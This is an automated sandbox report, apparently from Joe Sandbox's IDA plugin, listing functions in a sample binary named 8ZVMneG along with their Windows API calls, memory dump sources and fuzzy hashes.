                                                                                                                                                                                                                                                                  • Instruction ID: 4da5d747b47a65a831026c6dd6f5390a9c31f9669d9004ab715012eda2ab0a5b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4763fbc1090eb783ba5978d41c5536b3f5aca7dd4288bce5d9ec584a2b02adae
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31937290151EAFCB15DE68C984EE9B7B9BF08328B18122EE551F3290E732E945CB51
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4800bbba03f83e9031ac7fa478cf1eac92a3bcf33f9628628e14c7c691f03d4
• Instruction ID: 0831b148edcad4e5bbb78654dd974d3c33e18e15b6db741c3ab5dcccfccebbdd
• Opcode Fuzzy Hash: a4800bbba03f83e9031ac7fa478cf1eac92a3bcf33f9628628e14c7c691f03d4
• Instruction Fuzzy Hash: B8016D336002265FCB199F69ED41D6B33A5FBC0764321912AFA24FB255DF30D806C750

Control-flow Graph

APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00EC8825
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0
• Opcode ID: d2955eb329fbbce40f9f0f44c6fd04ba85627761f37665d895bf79bbdec7228f
• Instruction ID: f3746e3dc0d82822a74d28a25be9dbb5390b661d7f7daa16f8ed9aa39c8912f4
• Opcode Fuzzy Hash: d2955eb329fbbce40f9f0f44c6fd04ba85627761f37665d895bf79bbdec7228f
• Instruction Fuzzy Hash: B521A8B4904209DFDB08EF64D651BAEBBF0FF48300F40846EE859AB350DB359A46CB91
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00EC8C0B
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0
• Opcode ID: 42dd5950fed9cdb3102dfa571f4af143d1626f837496086c5bce9dc75e6bd179
• Instruction ID: 2e61c022265b24fc8bc80111ee1f5c8f473357cbfebbfa384e28ba3399403378
• Opcode Fuzzy Hash: 42dd5950fed9cdb3102dfa571f4af143d1626f837496086c5bce9dc75e6bd179
• Instruction Fuzzy Hash: 1A21D8B4905209DFDB08EF68C651BAEFBF0BF44300F40846DE449AB350DB359A46CB92
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: CriticalLeaveSection
• String ID:
• API String ID: 3988221542-0
• Opcode ID: 8f421e4b84ad997d4a61e9cf8488dc0d58add259e3eb3bb59453e2e46ac1e8a3
• Instruction ID: 6ed9ca4159bc711a1f04b475dd7ce02522734fcbae75c276fa6c6c8f67af2017
• Opcode Fuzzy Hash: 8f421e4b84ad997d4a61e9cf8488dc0d58add259e3eb3bb59453e2e46ac1e8a3
• Instruction Fuzzy Hash: 3501D67260925A5ACB099A78AB59FE8BB91EF4633CF2C617FD461A8092CA134853D211
APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,00ED7620,00000001,00000364,?,00000006,000000FF,?,00ED126E,00EF1540,0000000C), ref: 00ED8741
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: b099dfc10d6aaec8debd1d75341b10f70373ca6f794de095ab9198789673b5fb
• Instruction ID: 90e39e8e6b02bb3fac337be7c7e33c1533d3ab0adf310fac8dd051c06f93781d
• Opcode Fuzzy Hash: b099dfc10d6aaec8debd1d75341b10f70373ca6f794de095ab9198789673b5fb
• Instruction Fuzzy Hash: 6BF05B31501124ABAB115E669E45F5A77D8DF817A4B287453A854F6391CE70D8038591
APIs
• RtlAllocateHeap.NTDLL(00000000,00ED935A,?,?,00ED935A,00000220,?,00000001,?), ref: 00ED73B3
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4ac2b7fe16e55e131cf236362bda1419a083c1e84f07e0b0d3ef94fbe03f6206
                                                                                                                                                                                                                                                                  • Instruction ID: d8757240f87db616a51bd365dc1bfe7d55f3085b4e678d14bab3c7db710b552c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ac2b7fe16e55e131cf236362bda1419a083c1e84f07e0b0d3ef94fbe03f6206
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CFE065311092129AE7212B669C01F5B3A88DF817A4F193163EC94B63D5FB61CC02A1A5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                  • Opcode ID: d3fede1bac23fcd1b1581a763edbdb5746355ae0ba756c3bd491edeb0966ed5f
                                                                                                                                                                                                                                                                  • Instruction ID: f7424cf5f9961e879d87b8fb9194e97ad041bfb4f41e69cdf1b06297a28b3905
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3fede1bac23fcd1b1581a763edbdb5746355ae0ba756c3bd491edeb0966ed5f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60D23672E0826D8FDB65CE29DD447EAB7B5EB84304F1451EAD40DB7240EB78AE818F41
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00EDC747,00000002,00000000,?,?,?,00EDC747,?,00000000), ref: 00EDCE0F
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00EDC747,00000002,00000000,?,?,?,00EDC747,?,00000000), ref: 00EDCE38
                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00EDC747,?,00000000), ref: 00EDCE4D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                  • Opcode ID: 85cdf6e73df8426cd934c74b10adc2e5869525fb102f8901846c81ca49ff0266
                                                                                                                                                                                                                                                                  • Instruction ID: 3e3db180477ebd532755d5356b3e935188943930dda3020dc1153cde32ff80a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85cdf6e73df8426cd934c74b10adc2e5869525fb102f8901846c81ca49ff0266
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21F762600102AADB348F14CD00AA777A7EB44BD8B36A436E90AF7301E732CD03C390
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
                                                                                                                                                                                                                                                                    • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00EDC719
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00EDC757
                                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00EDC76A
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EDC7B2
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EDC7CD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                                                                                                                  • Opcode ID: d5ccbb6367beed15396ffab2ae78ff0e5baf3b05b6a035eabe9fff3c8b291b24
                                                                                                                                                                                                                                                                  • Instruction ID: 7aba14ac574993cee793873d06c4b11106c65c1915228e1f4004172d5d290cad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5ccbb6367beed15396ffab2ae78ff0e5baf3b05b6a035eabe9fff3c8b291b24
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9513F7190020AAEDB10DFB5DC81ABA77B8EF48784F24646BA510F7291EB70D906CB61
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
• Instruction ID: 09fda980ce19e0da05365bc11833d5e890837992ee04c4460143fab019fd4883
• Opcode Fuzzy Hash: 0370feb49d06202b0a8a2cb5e48f043198ba8953b6faff8e379c5fb6cd4322bb
• Instruction Fuzzy Hash: C0021C72E016199BDF14CFA9C9906AEFBF1FF88314F24826AD519B7341D731A942CB90
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EDD448
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 2655a04abeb1238d9858a7430c21b6b4079a8da99d729672b6a181db56a5f5eb
• Instruction ID: 3cc6cf2523f0396996b775a28e6966f85090cdcf97480f84d741be84319d0e8a
• Opcode Fuzzy Hash: 2655a04abeb1238d9858a7430c21b6b4079a8da99d729672b6a181db56a5f5eb
• Instruction Fuzzy Hash: 0671E8719091589FDF25AF28DC89AFDBBB8EB05308F1451DAE049B7351EA318EC69F10
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00ECB658
• IsDebuggerPresent.KERNEL32 ref: 00ECB724
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00ECB73D
• UnhandledExceptionFilter.KERNEL32(?), ref: 00ECB747
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 0d1e4f5e676aa93c5d199874a0d764a80a36ddaa4d3168867d905592d51ecce1
• Instruction ID: dada10168f7464764bd1309d41c5e153df52ffc6ffdf986268c84e80e46c5ac7
• Opcode Fuzzy Hash: 0d1e4f5e676aa93c5d199874a0d764a80a36ddaa4d3168867d905592d51ecce1
• Instruction Fuzzy Hash: C831F975D053189BDF20DF65D94ABCDBBF8AF48304F1041AAE40CAB251EB719A85CF45
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 00ECC379
• GetCurrentThreadId.KERNEL32 ref: 00ECC388
• GetCurrentProcessId.KERNEL32 ref: 00ECC391
• QueryPerformanceCounter.KERNEL32(?), ref: 00ECC39E
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: e3eaf246e4f0a7487de45c5edd894af5d60a4a2ae5d0c6f53d7a10c242ad238b
• Instruction ID: 5a829d42e31b71b24c5fc16696df61cc0276c20d97b65258c2452c7a9562c0aa
• Opcode Fuzzy Hash: e3eaf246e4f0a7487de45c5edd894af5d60a4a2ae5d0c6f53d7a10c242ad238b
• Instruction Fuzzy Hash: BDF05F74D1120DEFCB04DBB5DA4999EBBF4FF9C204B914695A412F7111EA30AA48DF50
APIs
  • Part of subcall function 00ED75D3: GetLastError.KERNEL32(?,?,00ED126E,00EF1540,0000000C), ref: 00ED75D7
  • Part of subcall function 00ED75D3: SetLastError.KERNEL32(00000000), ref: 00ED7679
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC951
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC99B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDCA61
Memory Dump Source
• Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: 1ad9af5bdbd4e36f74c96dedbda5f92b2d998e7f9f17bdc86c4ac65f5caf3497
• Instruction ID: f9a1819ad761a302788edcf9261dc2c0974f9c8a3ec810c8cbfd208023dcaaca
• Opcode Fuzzy Hash: 1ad9af5bdbd4e36f74c96dedbda5f92b2d998e7f9f17bdc86c4ac65f5caf3497
• Instruction Fuzzy Hash: 4F61A47151020B9FDB28DF25CD82BBAB7A8EF04384F20517BE906E6785E734D946DB50
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00ED3D09
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00ED3D13
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00ED3D20
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                  • Opcode ID: db233172ec044e9c787df611aa82f8e2d51eba38e79f8aa2b075c28c9bd4c0dd
                                                                                                                                                                                                                                                                  • Instruction ID: 62c0229834112e75b704aa95bf2316d96e60b2a9f26ee3ff81c5199b2fb4f8ad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db233172ec044e9c787df611aa82f8e2d51eba38e79f8aa2b075c28c9bd4c0dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB31D2749012289BCB21DF29DD89B9CBBB8BF48310F5055EAE40CA7251EB709F868F45
                                                                                                                                                                                                                                                                  APIs
